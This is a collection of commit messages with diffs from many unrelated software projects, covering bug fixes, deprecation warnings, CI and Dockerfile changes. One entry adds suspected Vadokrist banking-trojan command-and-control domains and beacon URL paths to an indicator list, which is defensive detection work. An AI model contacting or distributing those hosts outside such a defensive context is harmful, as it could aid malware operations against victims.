1 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2
Attempt to fix assumed auto-merge deletion This test had a chunk missing from it
@@ -103,6 +103,14 @@ class TestJobEndpoint(ResourceTestCaseMixin, TestCase): post_file = os.path.join('job', 'test', 'posts', 'handle_reopt_error.json') post = json.load(open(post_file, 'r')) + + resp = self.api_client.post('/dev/job/', format='json', data=post) + self.assertHttpCreated(resp) + r = json.loads(resp.content) + run_uuid = r.get('run_uuid') + + resp = self.api_client.get(f'/dev/job/{run_uuid}/results') + r = json.loads(resp.content) assert('errors' in r["messages"].keys()) assert('warnings' in r["messages"].keys()) assert(resp.status_code==400)
Fix unicode error for downloads with unicode filenames. Fixes
@@ -90,7 +90,8 @@ def urlparams(url_, hash=None, **query): New query params will be appended to existing parameters, except duplicate names, which will be replaced. """ - url = django_urlparse(url_) + url = django_urlparse(force_text(url_)) + fragment = hash if hash is not None else url.fragment # Use dict(parse_qsl) so we don't get lists of values.
utils/serializer: Fix exception handling in Python3 Allow for the fact that exceptions do not have a 'message' attribute in Python3.
@@ -231,7 +231,7 @@ class yaml(object): lineno = None if hasattr(e, 'problem_mark'): lineno = e.problem_mark.line # pylint: disable=no-member - raise SerializerSyntaxError(e.message, lineno) + raise SerializerSyntaxError(e.args[0] if e.args else str(e), lineno) loads = load
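For illustration, a standalone check of the behaviour the fix relies on (not the WA code itself): Python 3 exceptions carry no .message attribute, but the original arguments are still available on e.args.

try:
    raise ValueError("bad value")
except ValueError as e:
    # e.message would raise AttributeError on Python 3
    print(e.args)                            # ('bad value',)
    print(e.args[0] if e.args else str(e))   # 'bad value'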
Update readSettings.py Remove the old permissions setting from the defaults.
@@ -116,7 +116,6 @@ class ReadSettings: 'embed-subs': 'True', 'embed-only-internal-subs': 'False', 'sub-providers': '', - 'permissions': '777', 'post-process': 'False', 'pix-fmt': '', 'preopts': '',
Prevent displaying related events dropdown when the link query param is present.
@@ -480,7 +480,7 @@ class BookRoomModal extends React.Component { disabled={bookingBlocked(fprops)} required /> </Segment> - {this.renderRelatedEventsDropdown(bookingBlocked(fprops), fprops.form.mutators)} + {!link && this.renderRelatedEventsDropdown(bookingBlocked(fprops), fprops.form.mutators)} </Form> {conflictsExist && this.renderBookingConstraints(Object.values(availability.conflicts))} {this.renderBookingState(fprops)}
fix: F821 undefined name 'InternalError' Thanks, flake8.
@@ -80,7 +80,7 @@ def return_coordinates(doctype, filters_sql): """SELECT name, latitude, longitude FROM `tab{}` WHERE {}""".format(doctype, filters_sql), as_dict=True, ) - except InternalError: + except frappe.db.InternalError: frappe.msgprint( frappe._("This Doctype does not contain latitude and longitude fields"), raise_exception=True )
Handle version=None When converted to a string, None becomes 'None'. The param should default to an empty string rather than None; that would fit better with the existing code.
@@ -1027,7 +1027,7 @@ def install(name=None, refresh=False, pkgs=None, **kwargs): # The user user salt cmdline with version=5.3 might be interpreted # as a float it must be converted to a string in order for # string matching to work. - if not isinstance(version_num, six.string_types): + if not isinstance(version_num, six.string_types) and version_num is not None: version_num = str(version_num) if not version_num: @@ -1363,7 +1363,7 @@ def remove(name=None, pkgs=None, version=None, **kwargs): # The user user salt cmdline with version=5.3 might be interpreted # as a float it must be converted to a string in order for # string matching to work. - if not isinstance(version_num, six.string_types): + if not isinstance(version_num, six.string_types) and version_num is not None: version_num = str(version_num) if version_num not in pkginfo and 'latest' in pkginfo: version_num = 'latest'
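For illustration, a small standalone check of the reasoning above (plain str is used here in place of six.string_types; this is not the Salt code itself): str() turns None into the truthy string 'None', so without the extra is-not-None guard the falsy check never fires.

version_num = None

print(str(None))        # 'None'
print(bool(str(None)))  # True -> "if not version_num" would be skipped

# With the added guard, None passes through untouched and stays falsy.
if not isinstance(version_num, str) and version_num is not None:
    version_num = str(version_num)
print(version_num, not version_num)  # None True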
Explicitly condition on results of needed jobs. ! failure() returns true for "success", "skipped", and "cancelled"
@@ -24,7 +24,7 @@ concurrency: name: Create conda-based installers for Windows, macOS, and Linux jobs: - build-noarch-conda-pkgs: + build-noarch-pkgs: name: Build ${{ matrix.pkg }} runs-on: ubuntu-latest if: github.event_name != 'release' @@ -96,8 +96,8 @@ jobs: runs-on: ${{ matrix.os }} needs: - build-matrix - - build-noarch-conda-pkgs - if: ${{ ! failure() }} + - build-noarch-pkgs + if: contains(fromJson('["success", "skipped"]'), needs.build-noarch-pkgs.result) && needs.build-matrix.result == 'success' strategy: matrix: target-platform: ${{fromJson(needs.build-matrix.outputs.target_platform)}} @@ -114,7 +114,7 @@ jobs: MACOS_INSTALLER_CERTIFICATE: ${{ secrets.MACOS_INSTALLER_CERTIFICATE }} APPLICATION_PWD: ${{ secrets.APPLICATION_PWD }} CONSTRUCTOR_TARGET_PLATFORM: ${{ matrix.target-platform }} - STATUS: ${{ needs.build-noarch-conda-pkgs.result }} + STATUS: ${{ needs.build-noarch-pkgs.result }} steps: - name: Checkout Code uses: actions/checkout@v3
zulip.scss: Remove dead CSS from 2013. We remove the dead CSS which was introduced in commit back in 2013 and doesn't seem to have any use now. It's probably the case that we removed the actual HTML structure which used this CSS since 2013 and forgot to clean up the CSS part.
@@ -855,12 +855,6 @@ td.pointer { border-bottom-left-radius: 3px; } -.message_header .icon-vector-narrow { - font-size: 0.6em; - position: relative; - top: -1px; -} - .copy-paste-text { /* Hide the text that we want copy paste to capture */ position: absolute;
Add deprecation warning for pre_save_duplicate * Add deprecation warning for pre_save_duplicate * Update mixin.py * [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see
import itertools +import warnings from itertools import repeat from typing import Dict, List, Optional @@ -197,7 +198,20 @@ class CloneMixin(object): pass def pre_save_duplicate(self, instance): # pylint: disable=R0201 - """Override this method to modify the duplicate instance before it's saved.""" + """ + This method has been deprecated and would be removed in the 5.0.0 release. + Please use `pre_clone_save` signal instead. + + See: https://github.com/tj-django/django-clone#signals for guidance. + """ + # TODO: Remove prior to v5.0.0 release + warnings.warn( + "The usage of `pre_save_duplicate` has been deprecated " + "and would be removed in the 5.0.0 release " + "Please use `pre_clone_save` signal instead.", + DeprecationWarning, + stacklevel=2, + ) return instance @transaction.atomic
Added cdipdir_vec. Same as cdipdir but for lists.
@@ -196,6 +196,10 @@ def cdipdir(time_in=None, iyear=None, idoy=None): For time out of interval, computation is made for nearest boundary. Same as SPEDAS cdipdir. """ + if (time_in is None) and (iyear is None) and (idoy is None): + print("Error: No time was provided.") + return + if (iyear is None) or (idoy is None): iyear, idoy, ih, im, isec = get_time_parts(time_in) @@ -253,12 +257,14 @@ def cdipdir(time_in=None, iyear=None, idoy=None): f3 = iyear + (idoy-1)/365.25 - maxind nloop = len(g0) if year1 <= maxind: + # years 1970-2020 g1 = ga[year1] h1 = ha[year1] for i in range(nloop): g[i] = g0[i]*f1 + g1[i]*f2 h[i] = h0[i]*f1 + h1[i]*f2 else: + # years 2020-2025 for i in range(nloop): g[i] = g0[i] + dg[i]*f3 h[i] = h0[i] + dh[i]*f3 @@ -302,7 +308,55 @@ def cdipdir(time_in=None, iyear=None, idoy=None): d2 = sts1 d3 = ct0 - return [d1, d2, d3] + return d1, d2, d3 + + +def cdipdir_vec(time_in=None, iyear=None, idoy=None): + """ + Compute dipole direction in GEO coordinates. + + Similar to cdipdir but for arrays. + + Parameters + ---------- + time_in: list of floats + iyear: list of int + idoy: list of int + + Returns + ------- + list of float + + Notes + ----- + Same as SPEDAS cdipdir_vec. + """ + if ((time_in is None or not isinstance(time_in, list)) + and (iyear is None or not isinstance(iyear, list)) + and (idoy is None or not isinstance(idoy, list))): + return cdipdir(time_in, iyear, idoy) + + if (iyear is None) or (idoy is None): + if len(time_in) == 1: + iyear, idoy, ih, im, isec = get_time_parts(time_in) + else: + iyear = [] + idoy = [] + for i in range(len(time_in)): + _iyear, _idoy, ih, im, isec = get_time_parts(time_in[i]) + iyear.append(_iyear) + idoy.append(_idoy) + + d1 = [] + d2 = [] + d3 = [] + for i in range(len(idoy)): + _d1, _d2, _d3 = cdipdir(None, iyear[i], idoy[i]) + d1.append(_d1) + d2.append(_d2) + d3.append(_d3) + + return d1, d2, d3 def tgsegsm_vect(time_in, data_in):
helper: Add muted stream unreads to unread_counts. We previously skipped setting unread_counts for streams which were muted. We now set these counts so that when unmuting (muted) streams we have values available to set their unread_count.
@@ -317,8 +317,6 @@ def classify_unread_counts(model: Any) -> UnreadCounts: for stream in unread_msg_counts['streams']: count = len(stream['unread_message_ids']) stream_id = stream['stream_id'] - if stream_id in model.muted_streams: - continue if [model.stream_dict[stream_id]['name'], stream['topic']] in model.muted_topics: continue
MAINT: handle case where input data is a python container [FIXED] Handling List or Tuple type hints requires that we consider containers when validating data types.
@@ -959,6 +959,9 @@ def _validate_data_type(self, data): }: return True + if isinstance(data, (tuple, list)): + data = data[0] + class_name = data.__class__.__name__ valid = class_name in self._data_types if not valid:
Add reminder to clear build/ directory. Otherwise full-build detritus can get bundled into the lite build. See issue
@@ -136,7 +136,7 @@ Release Procedure `git tag vX.Y.Z` - Push the tag to Github with: `git push <github-remote> vX.Y.Z` - - Push the package to PyPI with: - `cd python && ./setup.py sdist bdist_wheel upload` - Push the lite package to PyPI with: - `cd python && ./setup.py lite sdist bdist_wheel upload` + `cd python && rm -rf build && ./setup.py lite sdist bdist_wheel upload` + - Push the package to PyPI with: + `cd python && rm -rf build && ./setup.py sdist bdist_wheel upload`
Disable additional shuffling while training Before this change the dataset was shuffled once and then a random sample was returned on every step. The problem is that this way we do not guarantee that all samples from the dataset will be used.
@@ -387,16 +387,22 @@ class Tub(object): pass - def get_record_gen(self, record_transform=None, shuffle=True, df=None): + def get_record_gen(self, record_transform=None, shuffle=False, df=None): if df is None: df = self.get_df() - while True: - for row in self.df.iterrows(): + for row in df.iterrows(): + # NOTE: If shuffle enabled, random sample will be returned, + # this does not guarantee that all samples will be used + # during training. Please also note that shuffling already + # happening once for whole dataset in get_train_val_gen + # function. if shuffle: record_dict = df.sample(n=1).to_dict(orient='record')[0] + else: + record_dict = row[1].to_dict() if record_transform: record_dict = record_transform(record_dict) @@ -406,7 +412,7 @@ class Tub(object): yield record_dict - def get_batch_gen(self, keys, record_transform=None, batch_size=128, shuffle=True, df=None): + def get_batch_gen(self, keys, record_transform=None, batch_size=128, shuffle=False, df=None): record_gen = self.get_record_gen(record_transform, shuffle=shuffle, df=df)
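For illustration, a rough standalone demonstration of the coverage problem described above (made-up DataFrame, not the Tub code): drawing one random row per step for an epoch of n steps amounts to sampling with replacement, which on average leaves roughly 1/e (about 37%) of the rows unseen.

import pandas as pd

df = pd.DataFrame({"x": range(1000)})

seen = set()
for _ in range(len(df)):  # one "epoch" of per-step random draws
    seen.add(df.sample(n=1).index[0])

print("distinct rows seen: %d / %d" % (len(seen), len(df)))  # typically ~630, not 1000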
Raise warning only if check_sld is True If the user is not worried about the slenderness ratio this warning can pollute the output screen. This avoids raising the warning when we are not checking the slenderness ratio.
@@ -1391,6 +1391,8 @@ class Rotor(object): for shaft in self.shaft_elements if shaft.slenderness_ratio < 1.6 ] + + if check_sld: if len(SR): warnings.warn( "The beam elements " @@ -1438,7 +1440,7 @@ class Rotor(object): ), showlegend=False, hoverinfo="none", - ), + ) ) # plot shaft elements @@ -1889,7 +1891,7 @@ class Rotor(object): t_, yout, xout = self.time_response(speed, F, t) results = TimeResponseResults( - t, yout, xout, self.nodes, self.nodes_pos, self.number_dof, + t, yout, xout, self.nodes, self.nodes_pos, self.number_dof ) return results @@ -3199,10 +3201,10 @@ def rotor_example(): ] disk0 = DiskElement.from_geometry( - n=2, material=steel, width=0.07, i_d=0.05, o_d=0.28, + n=2, material=steel, width=0.07, i_d=0.05, o_d=0.28 ) disk1 = DiskElement.from_geometry( - n=4, material=steel, width=0.07, i_d=0.05, o_d=0.28, + n=4, material=steel, width=0.07, i_d=0.05, o_d=0.28 ) stfx = 1e6
use pytest `python setup.py test` has been deprecated.
@@ -31,7 +31,7 @@ The sections below outline the steps in each case. 1. (**important**) announce your plan to the rest of the community *before you start working*. This announcement should be in the form of a (new) issue; 1. (**important**) wait until some kind of consensus is reached about your idea being a good idea; 1. if needed, fork the repository to your own Github profile and create your own feature branch off of the latest master commit. While working on your feature branch, make sure to stay up to date with the master branch by pulling in changes, possibly from the 'upstream' repository (follow the instructions [here](https://help.github.com/articles/configuring-a-remote-for-a-fork/) and [here](https://help.github.com/articles/syncing-a-fork/)); -1. make sure the existing tests still work by running ``python setup.py test``; +1. make sure the existing tests still work by running ``pytest``; 1. add your own tests (if necessary); 1. update or expand the documentation; 1. update the `CHANGELOG.md` file with change;
Add missing DHCPv6 ports to constants Still not in use. Will be used in [1] [1] Partially-implements: blueprint ipv6
@@ -117,6 +117,8 @@ METADATA_HTTP_PORT = 80 DHCP_CLIENT_PORT = 68 DHCP_SERVER_PORT = 67 +DHCPV6_CLIENT_PORT = 546 +DHCPV6_SERVER_PORT = 547 EMPTY_MAC = '00:00:00:00:00:00' BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
Update travis.yml The CI is refactored to include the two stages "linting" and "test". The former includes a check of black code style and is (currently) allowed to fail.
@@ -7,9 +7,19 @@ python: install: - pip install docutils - pip install -e . + - pip install black>=19.10b0 env: MPLBACKEND=Agg +jobs: + allow_failures: + env: + - CAN_FAIL=true + include: + - stage: "linting" + env: CAN_FAIL=true + script: black --check . + - stage: "test" script: - pytest - rst2html.py --halt=2 README.rst >/dev/null
Use context manager for file open Also remove a useless print statement to reduce noise
@@ -161,7 +161,6 @@ class SiteManager: exists = cursor.fetchone() if exists: # Assume metricity is already populated if it exists - print("Metricity already exists, not creating.") return print("Creating metricity relations and populating with some data.") cursor.execute("CREATE DATABASE metricity") @@ -171,8 +170,8 @@ class SiteManager: database="metricity", **db_connection_kwargs ) - with conn.cursor() as cursor: - cursor.execute(open("postgres/init.sql").read()) + with conn.cursor() as cursor, open("postgres/init.sql", encoding="utf-8") as f: + cursor.execute(f.read()) def prepare_server(self) -> None: """Perform preparation tasks before running the server."""
Updated Dependency Installation name It said Ubuntu before but was changed to Fedora (since Ubuntu is already covered above).
@@ -8,7 +8,7 @@ Local Installation (For Development) [*Also remember the database dependency in the README.md file*](http://ghtorrent.org/msr14.html) 1. [Dependency Installation for Ubuntu](#Ubuntu) -1. [Dependency Installation for Ubuntu](#Fedora) +1. [Dependency Installation for Fedora](#Fedora) 1. [Dependency Installation for OS X](#MacOSX) ### 2. [Install Augur](#Install)
Fix last example command to remove postgres data vol Change the name of the postgres data volume container.
@@ -266,4 +266,4 @@ Delete a persistent storage volume: **WARNING: All postgres data will be destroyed.** - `$ docker-compose stop -t 0 postgres` - `$ docker-compose rm postgres` - - `$ docker volume rm osf_postgres_data_vol` + - `$ docker volume rm osfio_postgres_data_vol`
Update querying.rst From the original description, it sounded like using .tuples(), .dicts() etc. would imply .iterator(), which is not the case. Explicitly state that for maximum performance you might want to do both, and show how you should do it.
@@ -711,6 +711,21 @@ dictionaries, namedtuples or tuples. The following methods can be used on any * :py:meth:`~BaseQuery.namedtuples` * :py:meth:`~BaseQuery.tuples` +Don't forget to append the :py:meth:`~BaseQuery.iterator` method call to also +reduce memory consumption. For example, the above code might look like: + +.. code-block:: python + + # Let's assume we've got 10 million stat objects to dump to a csv file. + stats = Stat.select() + + # Our imaginary serializer class + serializer = CSVSerializer() + + # Loop over all the stats (rendered as tuples, without caching) and serialize. + for stat_tuple in stats.tuples().iterator(): + serializer.serialize_tuple(stat_tuple) + When iterating over a large number of rows that contain columns from multiple tables, peewee will reconstruct the model graph for each row returned. This operation can be slow for complex graphs. For example, if we were selecting a
Python API: fix the wrapping of integer values TN:
@@ -140,7 +140,7 @@ class PythonAPISettings(AbstractAPISettings): return dispatch_on_type(type, [ (ct.bool_type, lambda _: ctype_type('c_uint8')), - (ct.long_type, lambda _: ctype_type('c_long')), + (ct.long_type, lambda _: ctype_type('c_int')), (ct.lexical_env_type, lambda _: 'LexicalEnv._c_type'), (ct.logic_var_type, lambda _: 'LogicVar._c_type'), (ct.equation_type, lambda _: 'Equation._c_type'),
Update dynamics_model_utils.py To increase readability, make use of pandas index method `get_loc` instead of relying on `np.where`.
@@ -770,7 +770,7 @@ class BaseDynamics: self.weights_upper &= w_upper def load_pars(self, adata, gene): - idx = np.where(adata.var_names == gene)[0][0] if isinstance(gene, str) else gene + idx = adata.var_names.get_loc(gene) if isinstance(gene, str) else gene self.alpha = adata.var["fit_alpha"][idx] self.beta = adata.var["fit_beta"][idx] * adata.var["fit_scaling"][idx] self.gamma = adata.var["fit_gamma"][idx]
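For illustration, a tiny standalone comparison of the two lookups (made-up gene index, not the scVelo data):

import numpy as np
import pandas as pd

var_names = pd.Index(["Actb", "Gapdh", "Sox2"])

idx_old = np.where(var_names == "Gapdh")[0][0]  # positional lookup via numpy
idx_new = var_names.get_loc("Gapdh")            # pandas Index does this directly

assert idx_old == idx_new == 1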
Update contact_list.py Try to fix
@@ -73,8 +73,8 @@ class ContactList(MyTreeView): selected_keys.append(sel_key) if not selected_keys or not idx.isValid(): menu.addAction(_("New contact"), lambda: self.parent.new_contact_dialog()) - menu.addAction(_("Import file"), lambda: self.import_contacts()) - menu.addAction(_("Export file"), lambda: self.export_contacts()) + menu.addAction(_("Import file"), lambda: self.parent.import_contacts()) + menu.addAction(_("Export file"), lambda: self.parent.export_contacts()) else: column_title = self.model().horizontalHeaderItem(column).text() column_data = '\n'.join(self.model().itemFromIndex(s_idx).text()
Make MlflowClient serializable Make the Java MlflowClient class implement Serializable so that it can be used in Spark jobs
@@ -10,6 +10,7 @@ import org.mlflow.api.proto.Service.*; import org.mlflow.tracking.creds.*; import java.io.File; +import java.io.Serializable; import java.net.URI; import java.net.URISyntaxException; import java.util.ArrayList; @@ -21,7 +22,7 @@ import java.util.stream.Collectors; /** * Client to an MLflow Tracking Sever. */ -public class MlflowClient { +public class MlflowClient implements Serializable { protected static final String DEFAULT_EXPERIMENT_ID = "0"; private final MlflowProtobufMapper mapper = new MlflowProtobufMapper();
Update vadokrist.txt Parsed addresses from screenshots (absent from the base IoC list in ESET's article).
@@ -15,6 +15,12 @@ http://191.237.255.155 http://191.239.244.141 http://191.239.245.87 http://191.239.255.102 +cloudmx.homelinux.com +dumblegat.simple-url.com +javfoms.podzone.org +jotagot.mypets.ws +metalpink.serveftp.org +vemvem.duckdns.org # Reference: https://twitter.com/wwp96/status/1366485090340077572 # Reference: https://app.any.run/tasks/e5727887-2bdb-4f37-a1ad-cb43d88a9828/ @@ -35,3 +41,11 @@ shax9281930x892.s3-sa-east-1.amazonaws.com /paodequeijo/HGFGHGFH.php /sh2002039/000000.php +/JarLOTESmefrasd121.php +/KROmsoameo201920mda.php +/LABrusoamdoo10192012.php +/LOPRSMo109102912.php +/ORTEGAHSK019mersoak.php +/Posmeoirmso01929MKDK.php +/timdim.php +/timdim02.php
JSON: throw warning for incompatible function names If functions share names with nodes or graphs, they'll be treated as references to the node or graph instead.
@@ -199,6 +199,7 @@ import pint import psyneulink import re import types +import warnings from psyneulink.core.globals.keywords import \ MODEL_SPEC_ID_COMPOSITION, MODEL_SPEC_ID_GENERIC, MODEL_SPEC_ID_NODES, MODEL_SPEC_ID_PARAMETER_SOURCE, \ @@ -206,7 +207,7 @@ from psyneulink.core.globals.keywords import \ MODEL_SPEC_ID_SENDER_MECH, MODEL_SPEC_ID_SENDER_PORT, MODEL_SPEC_ID_TYPE, MODEL_SPEC_ID_OUTPUT_PORTS, MODEL_SPEC_ID_MDF_VARIABLE, MODEL_SPEC_ID_INPUT_PORTS, MODEL_SPEC_ID_SHAPE, MODEL_SPEC_ID_METADATA from psyneulink.core.globals.parameters import ParameterAlias from psyneulink.core.globals.sampleiterator import SampleIterator -from psyneulink.core.globals.utilities import convert_to_list, get_all_explicit_arguments, \ +from psyneulink.core.globals.utilities import convert_to_list, gen_friendly_comma_str, get_all_explicit_arguments, \ parse_string_to_psyneulink_object_string, parse_valid_identifier, safe_equals, convert_to_np_array __all__ = [ @@ -651,6 +652,14 @@ def _generate_component_string( # pnl objects only have one function unless specified in another way # than just "function" if 'functions' in component_dict: + dup_function_names = set([name for name in component_dict['functions'] if name in component_identifiers]) + if len(dup_function_names) > 0: + warnings.warn( + f'Functions ({gen_friendly_comma_str(dup_function_names)}) of' + f' {name} share names of mechanisms or compositions in this' + ' model. This is likely to cause incorrect script reproduction.' + ) + function_determined_by_output_port = False try:
Update Dockerfile.dev Made some changes to support Python 3 and fixed a few path-related issues.
-FROM ubuntu +FROM ubuntu:18.04 MAINTAINER perryism @@ -6,8 +6,12 @@ RUN apt-get update && \ apt-get -y install \ wget \ zip \ - python-pip \ + python3-pip \ + python3-dev \ git \ + && cd /usr/local/bin \ + && ln -s /usr/bin/python3 python \ + && pip3 install --upgrade pip \ && rm -rf /var/lib/apt/lists/* ARG VERSION=0.9.0 @@ -19,12 +23,12 @@ WORKDIR /app/knowledge-repo-$VERSION COPY . /app/knowledge-repo-$VERSION -RUN pip install -r requirements.txt +RUN pip3 install -r docker/requirements.txt -COPY entrypoint.sh /app/knowledge-repo-$VERSION +COPY docker/entrypoint.sh /app/knowledge-repo-$VERSION VOLUME /data EXPOSE 7000 -CMD ["./entrypoint.sh"] +CMD ["bash", "./entrypoint.sh"]
fix arg type Change the default arg type from string to int.
@@ -97,7 +97,7 @@ if __name__ == '__main__': '--out', dest='output', default='out.jpg', help='the name of the output file.') parser.add_argument( - '--max-results', dest='max_results', default=4, + '--max-results', dest='max_results', default=4, type=int, help='the max results of face detection.') args = parser.parse_args()
Internally enable Flake8 lints for invalid whitespace W291 - Trailing whitespace W293 - blank line contains whitespace
@@ -5,8 +5,6 @@ extend-ignore: E501, # line too long (> 79 characters) E731, # Do not assign a lambda expression E741, # Ambiguous variable name (enable once fixed) - W291, # Trailing whitespace (enable once fixed) - W293, # Blank line contains whitespace (enable once fixed) W503, # line break before binary operator (conflicts with Black) W605, # invalid escape sequence (enable once fixed) PB10, # Bad class attribute (enable once fixed)
Handle different kernel builds on SUSE Linux Enterprise SUSE has introduced the kernel-azure build to support faster feature enablement for Azure than is possible with the kernel-default build. This requires that the RDMA kernel modules are built against both kernels. Therefore the agent must install the proper package for the running kernel.
# Microsoft Azure Linux Agent
 #
-# Copyright 2017 Microsoft Corporation
+# Copyright 2018 Microsoft Corporation
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -40,7 +40,23 @@ class SUSERDMAHandler(RDMAHandler):
     zypper_remove = 'zypper -n rm %s'
     zypper_search = 'zypper -n se -s %s'
     zypper_unlock = 'zypper removelock %s'
+    package_name = 'dummy'
+    # Figure out the kernel that is running to find the proper kmp
+    cmd = 'uname -r'
+    status, kernel_release = shellutil.run_get_output(cmd)
+    if 'default' in kernel_release:
+        package_name = 'msft-rdma-kmp-default'
+        info_msg = 'RDMA: Detected kernel-default'
+        logger.info(info_msg)
+    elif 'azure' in kernel_release:
+        package_name = 'msft-rdma-kmp-azure'
+        info_msg = 'RDMA: Detected kernel-azure'
+        logger.info(info_msg)
+    else:
+        error_msg = 'RDMA: Could not detect kernel build, unable to '
+        error_msg += 'load kernel module. Kernel release: "%s"'
+        logger.error(error_msg % kernel_release)
+        return
     cmd = zypper_search % package_name
     status, repo_package_info = shellutil.run_get_output(cmd)
     driver_package_versions = []
Improve _exprs() Show the user a message if the output from a function is nan. Some code improvements.
@@ -507,10 +507,9 @@ def cols(self): :return: json """ functions_array = ["min", "max", "stddev", "kurtosis", "mean", "skewness", "sum", "variance", - "approx_count_distinct", "na", "zeros", "percentile"] + "approx_count_distinct", "countDistinct", "na", "zeros", "percentile", "count"] _result = {} - if is_dict(data): - for k, v in data.items(): + for k, v in data[0].items(): for f in functions_array: temp_func_name = f + "_" if k.startswith(temp_func_name): @@ -518,13 +517,13 @@ def cols(self): # If the value is numeric only get 5 decimals if is_numeric(v): v = round(v, 5) - _result.setdefault(_col_name, {})[f] = v - else: - if is_numeric(data): - data = round(data, 5) - _result = data + if is_nan(v): + print( + "'{FUNCTION}' function in '{COL_NAME}' column is returning 'nan'. Is that what you expected?. Seems that {COL_NAME} has 'nan' values".format( + FUNCTION=f, + COL_NAME=_col_name)) - return _result + _result.setdefault(_col_name, {})[f] = v # Ensure that is a list funcs = val_to_list(funcs) @@ -540,7 +539,8 @@ def cols(self): # print(col_name, is_column_a(df, col_name, "date"), func is F.stddev) # Std dev is can not process date columns. So we do not calculated - if not ((func in [F.stddev, F.kurtosis, F.mean, F.skewness, F.sum, F.variance, zeros_agg]) and ( + if not ((func in [F.stddev, F.kurtosis, F.mean, F.skewness, F.sum, F.variance, F.approx_count_distinct, + F.count, zeros_agg]) and ( is_column_a(df, col_name, "date"))): # A different function must be use to calculate null in integers or data column data types if func is na_agg and is_column_a(df, col_name, PYSPARK_NUMERIC_TYPES): @@ -548,9 +548,7 @@ def cols(self): expression.append(func(col_name).alias(func.__name__ + "_" + col_name)) - # print(expression) - result = parse_col_names_funcs_to_keys(format_dict(df.agg(*expression).to_json())) - return result + return format_dict(parse_col_names_funcs_to_keys(df.agg(*expression).to_json())) # Quantile statistics @add_attr(cols)